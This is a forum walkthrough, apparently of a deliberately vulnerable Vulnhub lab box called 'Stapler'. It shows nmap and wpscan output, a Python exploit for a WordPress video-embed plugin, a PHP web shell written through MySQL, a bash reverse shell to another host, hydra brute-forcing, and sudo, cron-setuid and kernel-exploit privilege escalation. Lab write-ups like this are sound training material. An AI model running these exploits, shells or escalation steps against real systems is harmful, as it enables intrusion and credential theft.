qidao123.com ToB IT社区-企服评测·应用市场»论坛 数据库 分布式数据库 [Vulnhub] Stapler wp-videos+ftp+smb+bash_history权限 ...

[Vulnhub] Stapler wp-videos+ftp+smb+bash_history权限提拔+SUID权限提拔+Kernel权限提拔

[复制链接]
发表于 2026-4-24 08:51:40 | 显示全部楼层 |阅读模式
信息网络

IP AddressOpening Ports192.168.8.106TCP:21,22,53,80,123,137,138,139,666,3306,Using Nmap for scanning:
$ nmap -p- 192.168.8.106 --min-rate 1000 -sC -sV
The results are as follows:
  1. PORT      STATE  SERVICE     VERSION
  2. 20/tcp    closed ftp-data
  3. 21/tcp    open   ftp         vsftpd 2.0.8 or later
  4. | ftp-syst:
  5. |   STAT:
  6. | FTP server status:
  7. |      Connected to 192.168.35.1
  8. |      Logged in as ftp
  9. |      TYPE: ASCII
  10. |      No session bandwidth limit
  11. |      Session timeout in seconds is 300
  12. |      Control connection is plain text
  13. |      Data connections will be plain text
  14. |      At session startup, client count was 2
  15. |      vsFTPd 3.0.3 - secure, fast, stable
  16. |_End of status
  17. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  18. | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  19. |_Can't get directory listing: PASV failed: 550 Permission denied.
  20. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  21. 22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  22. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  23. | ssh-hostkey:
  24. |   2048 8121cea11a05b1694f4ded8028e89905 (RSA)
  25. |   256 5ba5bb67911a51c2d321dac0caf0db9e (ECDSA)
  26. |_  256 6d01b773acb0936ffab989e6ae3cabd3 (ED25519)
  27. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  28. 53/tcp    open   domain      dnsmasq 2.75
  29. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  30. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  31. | dns-nsid:
  32. |_  bind.version: dnsmasq-2.75
  33. 80/tcp    open   http        PHP cli server 5.5 or later
  34. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  35. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  36. |_http-title: 404 Not Found
  37. 123/tcp   closed ntp
  38. 137/tcp   closed netbios-ns
  39. 138/tcp   closed netbios-dgm
  40. 139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  41. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  42. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  43. 666/tcp   open   doom?
  44. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  45. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  46. | fingerprint-strings:
  47. |   NULL:
  48. |     message2.jpgUT
  49. |     QWux
  50. |     "DL[E
  51. |     #;3[
  52. |     \xf6
  53. |     u([r
  54. |     qYQq
  55. |     Y_?n2
  56. |     3&M~{
  57. |     9-a)T
  58. |     L}AJ
  59. |_    .npy.9
  60. 3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
  61. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  62. | mysql-info:
  63. |   Protocol: 10
  64. |   Version: 5.7.12-0ubuntu1
  65. |   Thread ID: 7
  66. |   Capabilities flags: 63487
  67. |   Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, SupportsTransactions, LongPassword, LongColumnFlag, FoundRows, InteractiveClient, SupportsCompression, DontAllowDatabaseTableColumn, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
  68. |   Status: Autocommit
  69. |   Salt:       W#C\x0C@-\x7F%fA^~o
  70. | TSI\x14,
  71. |_  Auth Plugin Name: mysql_native_password
  72. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  73. 12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
  74. |_http-title: Site doesn't have a title (text/html).
  75. |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
  76. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  77. |_http-server-header: Apache/2.4.18 (Ubuntu)
  78. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  79. SF-Port666-TCP:V=7.93%I=7%D=7/12%Time=6690DA03%P=i686-pc-windows-windows%r
  80. SF:(NULL,1000,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\
  81. SF:0\x152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x0
  82. SF:1\x04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A
  83. SF:@\xa2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9"DL\[E\
  84. SF:xa2\x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x
  85. SF:0f\xb2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\
  86. SF:xaeu\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x9
  87. SF:9\xd3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf
  88. SF:8\xa0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce
  89. SF:\[\x87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x
  90. SF:8b\xf4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\x
  91. SF:e0\xdc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe
  92. SF:4\xd5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf
  93. SF:1\xaf\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\
  94. SF:xe2:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x
  95. SF:1bk\x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\
  96. SF:xcc\xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c
  97. SF:\xfd\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\
  98. SF:xcc\x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\
  99. SF:xb0\xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(
  100. SF:\[r\xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\
  101. SF:xaak\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x
  102. SF:7fy\xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f
  103. SF:\x7f\xf9\xea\xb5m\x1c\xfc\xfef"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\
  104. SF:xcb\[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\x
  105. SF:f9\xcc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8
  106. SF:f\xa7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\
  107. SF:x81\xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0b
  108. SF:I\x96\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap
  109. SF:\x8f\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&
  110. SF:\xf4\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\
  111. SF:xcd\x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xb
  112. SF:c\xbcL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5
  113. SF:\xf0\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\
  114. SF:x04\xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6G
  115. SF:TQ\xf3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\
  116. SF:x11\?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
  117. MAC Address: 08:00:27:B7:CF:DD (Oracle VirtualBox virtual NIC)
  118. Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  120. Host script results:
  121. |_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
  122. |_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
  123. | smb-security-mode:
  124. |   account_used: guest
  125. |   authentication_level: user
  126. |   challenge_response: supported
  127. |_  message_signing: disabled (dangerous, but default)
  128. | smb2-security-mode:
  129. |   311:
  130. |_    Message signing enabled but not required
  131. | smb2-time:
  132. |   date: 2024-07-12T15:23:57
  133. |_  start_date: N/A
  134. |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
  135. |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
复制代码
当地权限:HTTPS 12380


https://192.168.35.101:12380/

$ dirb https://192.168.35.101:12380
https://192.168.35.101:12380/robots.txt

https://192.168.35.101:12380/blogblog/

$ wpscan --url "https://192.168.35.101:12380/blogblog/" --enumerate ap,u --disable-tls-checks
  1. [+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
  2. |  Latest version: 1.0 (up to date)
  3. |  Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
  4. |  Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
  5. [!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
复制代码
  1. import random
  2. import urllib2
  3. import re
  4. import ssl
  5. ssl._create_default_https_context = ssl._create_unverified_context
  7. url = "https://192.168.35.101:12380/blogblog" # insert url to wordpress
  9. randomID = long(random.random() * 100000000000000000L)
  11. objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
  12. content =  objHtml.readlines()
  13. for line in content:
  14.         numbers = re.findall(r'\d+',line)
  15.         id = numbers[-1]
  16.         id = int(id) / 10
  18. objHtml = urllib2.urlopen(url + '/?p=' + str(id))
  19. content = objHtml.readlines()
  21. for line in content:
  22.         if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
  23.                 urls=re.findall('"(https?://.*?)"', line)
  24.                 print urllib2.urlopen(urls[0]).read()
复制代码
$ python2 exp.py
https://192.168.35.101:12380/blogblog/wp-content/uploads/
$ curl -k https://192.168.35.101:12380/blogblog/wp-content/uploads/403901558.jpeg

username:root
password:plbkac
https://192.168.35.101:12380/phpmyadmin/sql.php?db=wordpress&table=wp_users&token=ef508c27b38a40a06a809e25d1c54027&pos=0
  1. +------------+------------------------------------+
  2. | user_login | user_pass                          |
  3. +------------+------------------------------------+
  4. | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
  5. | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
  6. | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
  7. | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
  8. | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
  9. | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
  10. | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
  11. | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
  12. | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
  13. | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
  14. | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
  15. | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
  16. | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
  17. | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
  18. | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
  19. | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
  20. +------------+------------------------------------+
复制代码
mysql> SELECT user, host, File_priv FROM mysql.user;

mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
https://192.168.8.106:12380/blogblog/wp-content/uploads/shell.php?cmd=%2fbin%2fbash+-c+%27bash+%3e%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3e%261%27

当地权限:暴力破解

$ enum4linux 192.168.8.106
罗列smb用户


$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
  1. peter
  2. RNunemaker
  3. ETollefson
  4. DSwanger
  5. AParnell
  6. SHayslett
  7. MBassin
  8. JBare
  9. LSolum
  10. IChadwick
  11. MFrei
  12. SStroud
  13. CCeaser
  14. JKanode
  15. CJoo
  16. Eeth
  17. LSolum2
  18. JLipps
  19. jamie
  20. Sam
  21. Drew
  22. jess
  23. SHAY
  24. Taylor
  25. mel
  26. kai
  27. zoe
  28. NATHAN
  29. www
  30. elly
复制代码
$ hydra -L users.txt -e nsr ftp://192.168.8.106

-e nsr: 启用额外的暗码实行选项
n: 实行空暗码(即不输入暗码)。
s: 实行将用户名作为暗码。
r: 实行将用户名反转后作为暗码。
username:SHayslett
password:SHayslett
username:elly
password:ylle
(elly)ftp> get passwd
  1. root
  2. daemon
  3. bin
  4. sys
  5. sync
  6. games
  7. man
  8. lp
  9. mail
  10. news
  11. uucp
  12. proxy
  13. www-data
  14. backup
  15. list
  16. irc
  17. gnats
  18. nobody
  19. systemd-timesync
  20. systemd-network
  21. systemd-resolve
  22. systemd-bus-proxy
  23. syslog
  24. _apt
  25. lxd
  26. dnsmasq
  27. messagebus
  28. sshd
  29. peter
  30. mysql
  31. RNunemaker
  32. ETollefson
  33. DSwanger
  34. AParnell
  35. SHayslett
  36. MBassin
  37. JBare
  38. LSolum
  39. IChadwick
  40. MFrei
  41. SStroud
  42. CCeaser
  43. JKanode
  44. CJoo
  45. Eeth
  46. LSolum2
  47. JLipps
  48. jamie
  49. Sam
  50. Drew
  51. jess
  52. SHAY
  53. Taylor
  54. mel
  55. kai
  56. zoe
  57. NATHAN
  58. www
  59. postfix
  60. ftp
  61. elly
复制代码
$ hydra -L users.txt -e nsr ssh://192.168.8.106


权限提拔:Bash汗青纪录

/home$ find -name ".bash_history" -exec cat {} \;

username:JKanode
password:thisimypassword
username:peter
password:JZQuyIN5
$ su peter
$ sudo -l
$ sudo find . -exec /bin/sh \; -quit

权限提拔:SUID

搜索Linux潜伏权限提拔弊端
http://www.securitysift.com/download/linuxprivchecker.py
$ python linuxprivchecker.py


通过pspy32监控监控进程也发现这是一个ROOT权限的定时任务

$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh
$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > /tmp/setuid.c
$ gcc /tmp/setuid.c -o /tmp/setuid
等候定时任务启动

$ /tmp/setuid

权限提拔:内核

$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
$ unzip 39772.zip
$ cd 39772
$ tar -xvf exploit.tar
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
$ ./doubleput

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

张春
+ 我要发帖

登录后关闭弹窗

登录参与点评抽奖  加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表